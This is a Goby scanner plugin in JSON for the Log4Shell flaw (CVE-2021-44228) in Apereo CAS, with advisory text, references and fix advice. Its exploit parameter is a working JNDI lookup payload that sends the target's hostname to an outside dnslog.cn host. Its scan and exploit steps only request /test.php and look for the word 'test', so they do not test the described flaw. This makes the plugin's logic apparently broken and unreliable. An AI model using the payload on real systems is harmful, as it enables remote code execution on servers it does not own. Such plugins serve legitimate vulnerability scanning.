Goby/json/apereo-CAS-log4shell-RCE-vu...


{
"Name": "apereo CAS log4shell RCE vulnerability (CVE-2021-44228)",
"Description": "<p>Apereo CAS is an open-source, multilingual enterprise single sign-on solution for the web.</p><p>Apereo CAS is affected by the Log4Shell remote code execution vulnerability (CVE-2021-44228). Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.</p>",
"Product": "apereo CAS",
"Homepage": "https://github.com/apereo/cas",
"DisclosureDate": "2021-12-22",
"Author": "keeeee",
"FofaQuery": "app=\"apereo-CAS\"",
"GobyQuery": "app=\"apereo-CAS\"",
"Level": "3",
"Impact": "<p>Attackers can use this vulnerability to execute code on the server side, write backdoors, obtain server permissions, and then control the entire web server.</p>",
"Recommendation": "<p>The vendor has released a fix; please upgrade to the fixed version: <a href=\"https://apereo.github.io/2021/12/11/log4j-vuln/\" target=\"_blank\">https://apereo.github.io/2021/12/11/log4j-vuln/</a></p><p>1. Deploy a web application firewall to monitor database operations.</p><p>2. If not necessary, prohibit public network access to the system.</p>",
"Translation": {
"CN": {
"Name": "apereo CAS log4shell 命令执行漏洞CVE-2021-44228",
"Product": "apereo CAS",
"VulType": [
"命令执行"
],
"Tags": [
"命令执行"
],
"Description": "<p>apereo CAS&nbsp;是一个开源的用于 Web 的企业多语言单点登录解决方案。</p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\">apereo CAS 存在&nbsp;log4shell RCE 漏洞。<span style=\"color: rgb(22, 51, 102); font-size: 16px;\">攻击者可通过该漏洞在服务器端任意执行代码写入后门获取服务器权限进而控制整个web服务器。</span></span><br></p>",
"Impact": "<p>攻击者可通过该漏洞在服务器端任意执行代码写入后门获取服务器权限进而控制整个web服务器。<br></p>",
"Recommendation": "<p>厂商已发布了漏洞方案,请及时关注: <a href=\"https://apereo.github.io/2021/12/11/log4j-vuln/\">https://apereo.github.io/2021/12/11/log4j-vuln/</a></p><p>1、通过防火墙等安全设备设置访问策略设置白名单访问。</p><p>2、如非必要禁止公网访问该系统。</p>"
}
},
"References": [
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228",
"https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"https://apereo.github.io/2021/12/11/log4j-vuln/"
],
"HasExp": true,
"ExpParams": [
{
"name": "dnslog",
"type": "input",
"value": "${jndi:ldap://${hostName}.xxx.dnslog.cn}"
}
],
"ExpTips": null,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"rce"
],
"VulType": [
"rce"
],
"CVEIDs": [
"CVE-2021-44228"
],
"CVSSScore": "10.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"CNNVD": [
"CNNVD-202112-799"
],
"CNVD": [
"CNVD-2021-95914"
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Is0day": false
}